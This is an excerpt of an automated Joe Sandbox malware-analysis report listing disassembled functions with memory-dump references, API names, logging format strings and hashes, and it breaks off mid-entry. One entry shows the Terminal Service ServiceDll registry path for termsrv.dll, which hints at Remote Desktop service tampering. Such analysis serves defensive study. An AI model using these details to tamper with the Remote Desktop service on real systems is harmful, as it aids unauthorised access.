                                                                                                                                                  • Instruction Fuzzy Hash: DCF05E10E0EA07D8FD21ABAEBC804B12290AF06BC4F4865B5CF0D57365EF1DA68AC300
                                                                                                                                                  Function 00007FF8B915CF94 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                                                                                                                                                  • Instruction ID: d989370117e27ff442e7930c8d3286487e26d7d20239ba50bff6a1dc5269743b
                                                                                                                                                  • Opcode Fuzzy Hash: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                                                                                                                                                  • Instruction Fuzzy Hash: 63F0BE64E0AAD741FA43AF5EE8104B422806F08BC4F499432DE0C96B56EE1CB585E300
                                                                                                                                                  Function 00007FF8B9181AA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                                                                                                                                                  • Instruction ID: fd222b74897f9dbe6fd12d064a1908f727ff3ae57ed5dd56cba605782f16bda5
                                                                                                                                                  • Opcode Fuzzy Hash: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                                                                                                                                                  • Instruction Fuzzy Hash: 06F08251E096C751FD569F9EE8805F022519F05BD4F498531CF0C57756FD1CA987B310
                                                                                                                                                  Function 00007FF8BFB52174 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                                                                                                                                                  • Instruction ID: e7ff4cf232b32bc323f9d46d2f015b9a5df29aa027b0a70aa4991b8754d4bf17
                                                                                                                                                  • Opcode Fuzzy Hash: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                                                                                                                                                  • Instruction Fuzzy Hash: C4F05810E0B64765FE5197DEEC604B473506F28BC0B480471DF0C66B62EE3CF5868300
                                                                                                                                                  Function 00007FF8BFB37474 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                                                                                                                                                  • Instruction ID: 7d29e204e8efd35ec5763c22cfd242136b69b9d2df01abb34351f3aaab0e9ee6
                                                                                                                                                  • Opcode Fuzzy Hash: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                                                                                                                                                  • Instruction Fuzzy Hash: 83F05815E8E60750FD55ABDEA8514B017606F08BD0B5C4432CF1C26756FD2CA9869300
                                                                                                                                                  Function 00007FF8BFB844A4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: d8dd7991dd3798304102d1c6ec9b6a5b169de9ed62c1dd31b0746ba544ad9bed
                                                                                                                                                  • Instruction ID: 129b38dfb0f56d9b3f657af8351ca6798785d394a605b4adb99039c610923640
                                                                                                                                                  • Opcode Fuzzy Hash: d8dd7991dd3798304102d1c6ec9b6a5b169de9ed62c1dd31b0746ba544ad9bed
                                                                                                                                                  • Instruction Fuzzy Hash: 31F05E10A4A64B81FD55ABDEA8449F02390AF48BC4F48A431CE0D5775AFD2CA646C300
                                                                                                                                                  Function 00007FF8BFB81942 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteshutdown
                                                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                                                                                                                  • API String ID: 2143829457-932964775
                                                                                                                                                  • Opcode ID: d6588b44ca74bd409c2f78fa1d34f814bde72a429c89db37472fc14125d1e203
                                                                                                                                                  • Instruction ID: 0372d173eb8bf139b0ac4ef13d43122c1b9e6ab6fd080b6f57a60e297fe26457
                                                                                                                                                  • Opcode Fuzzy Hash: d6588b44ca74bd409c2f78fa1d34f814bde72a429c89db37472fc14125d1e203
                                                                                                                                                  • Instruction Fuzzy Hash: D3F0E221E0D543C1EA146FADE8440F92350AF85BD8F94C632DB0C821F2FE2CA54BC300
                                                                                                                                                  Function 00007FF8BFB819A5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastclosesocketfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                                                                                                                  • API String ID: 152032778-2221966578
                                                                                                                                                  • Opcode ID: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                                                                                                                                                  • Instruction ID: 63d541d7c2bb6d7719950bd33f6727107b1dd9e040c96960f3e5754402777080
                                                                                                                                                  • Opcode Fuzzy Hash: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                                                                                                                                                  • Instruction Fuzzy Hash: C4F05890E0D647C1FA18ABFDE8410B82351AF94BF8F148335D73E562E3AE2CA586C300
                                                                                                                                                  Function 00007FF8B9185AC0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Openstrcmpstrlen
                                                                                                                                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                                                                                                                                  • API String ID: 679246061-1413152910
                                                                                                                                                  • Opcode ID: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                                                                                                                                                  • Instruction ID: 9441c1d6a57794b99c6655ae9db667440c4c3639640f577e8d18a6079f9be22e
                                                                                                                                                  • Opcode Fuzzy Hash: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                                                                                                                                                  • Instruction Fuzzy Hash: CC219D71A1CAC751EB208F18A8C03FA6355EF60394F850072E79D46196EF3CD649F650
                                                                                                                                                  Function 00007FF8BA4F2209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                                                                                                                                                  • Instruction ID: 2f2336f8919745b9f3495371c818de0d3b8023708aeb08f26edb127c750d331b
                                                                                                                                                  • Opcode Fuzzy Hash: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                                                                                                                                                  • Instruction Fuzzy Hash: 94F0F671F0C60296F32057ADAC405B65660EF857E4F119271EE2D833B4DE3CEA4A8700
                                                                                                                                                  Function 00007FF8B9152209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                                                                                                                                                  • Instruction ID: 3f2760fe8baa884364ab08d6b84d732b706c39ab5bbb6225552d4bed44006d37
                                                                                                                                                  • Opcode Fuzzy Hash: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                                                                                                                                                  • Instruction Fuzzy Hash: 5BF0C2B6E0828246F7104F6DA8001B55660EB957D4F218231EE1D933A4DE3CE846E700
                                                                                                                                                  Function 00007FF8B9184D89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                                                                                                                                                  • Instruction ID: b56c794e7f13711f668ddc68cf9206314b4cc8595b9d85b383e1ecc3752187d6
                                                                                                                                                  • Opcode Fuzzy Hash: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                                                                                                                                                  • Instruction Fuzzy Hash: 5FF02B61F0C18256F3104F2DA8401B96660AF947E4F118331EE2E933E5DE3CE847B701
                                                                                                                                                  Function 00007FF8BFB52349 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                                                                                                                                                  • Instruction ID: 5c49cc86d297a1da9224adbb52b373ee3a9d1ae7eee50ab03f3966d6b1a772b9
                                                                                                                                                  • Opcode Fuzzy Hash: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                                                                                                                                                  • Instruction Fuzzy Hash: 84F09661F0D64396F75057ADA8101B97360AB947D4F144131EF2D87BA4EE7CE9468700
                                                                                                                                                  Function 00007FF8BFB313F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                                                                                                                                                  • Instruction ID: ec4fce5cb663a7a586bcf2579707b35b64d9d83146bee0b60387a221d33d2a69
                                                                                                                                                  • Opcode Fuzzy Hash: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                                                                                                                                                  • Instruction Fuzzy Hash: 37F06D61F8850342F7105BAEB8001B95364AB847D4F518232EF2E937A4EE3CE9568B01
                                                                                                                                                  Function 00007FF8BFB818D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  • API String ID: 325303940-110789774
                                                                                                                                                  • Opcode ID: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                                                                                                                                                  • Instruction ID: 8410c7a29659df75c6854531af58257741b97c659d171a7f0c8538036e5edefd
